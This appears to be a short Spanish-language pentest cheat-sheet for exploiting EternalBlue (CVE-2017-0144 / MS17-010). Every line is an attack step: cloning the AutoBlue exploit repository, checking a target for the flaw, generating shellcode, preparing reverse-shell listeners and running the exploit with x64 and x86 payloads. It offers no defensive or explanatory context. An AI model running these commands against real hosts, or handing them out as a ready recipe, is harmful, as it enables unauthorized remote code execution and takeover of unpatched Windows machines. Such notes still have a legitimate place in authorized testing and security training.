EternalBlue (CVE-2017-0144 / MS17-010)

# Clonación de repositorio 
git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git
cd AutoBlue-MS17-010

# Revisión si objetivo es vulnerable a EternalBlue (CVE-2017-0144 / MS17-010)
python3 eternal_checker.py <target>

# Generación de shellcode
cd shellcode && ./shell_prep.sh

# Configuración de listeners de reverse shell
cd .. && ./listener_prep.sh

# Exploit
python3 eternalblue_exploit7.py <target> ./shellcode/sc_all.bin
python3 eternalblue_exploit7.py <target> ./shellcode/sc_x64.bin
python3 eternalblue_exploit7.py <target> ./shellcode/sc_x86.bin

Última actualización